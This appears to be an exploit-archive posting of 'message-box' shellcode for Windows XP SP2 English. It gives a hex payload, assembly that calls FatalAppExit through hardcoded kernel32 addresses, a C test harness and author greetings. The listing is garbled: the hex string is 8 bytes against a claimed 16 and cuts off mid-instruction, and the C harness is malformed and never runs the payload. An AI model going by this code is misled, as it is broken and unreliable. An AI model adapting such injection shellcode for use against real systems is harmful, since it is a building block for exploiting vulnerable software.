| Windows XP Pro Sp2 English "Message-Box" Shellcode. |

Size         : 16 Bytes, Null-Free.
Author       : Aodrulez. 
Email        : [email protected]

Shellcode = "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"

| Description: |


I've used a Function called "FatalAppExit".
The Benefits are Three-Fold!

1] Displays a MessageBox.
2] Terminates the Process. 
3] Its there in Kernel32.dll itself.


| Asm Code: |


 	      mov ecx,7c82dd38h ;"Admin" string in mem
 	      xor eax,eax
 	      mov ebx,7c860ad8h ;Addr of "FatalAppExit()" 
 		push ecx          ;function from Kernel32
 		push eax          
 		call ebx          ;App does a Clean Exit.


| Shellcodetest.c |


char code[] = "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"

int main(int argc, char **argv)
  int (*func)();
  func = (int (*)()) code;


| Greetz Fly Out To |


1] Amforked()	 : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] str0ke


| Forgive, O Lord, My Little Jokes on Thee,   |
| and I'll Forgive Thy Great Big Joke on Me.  |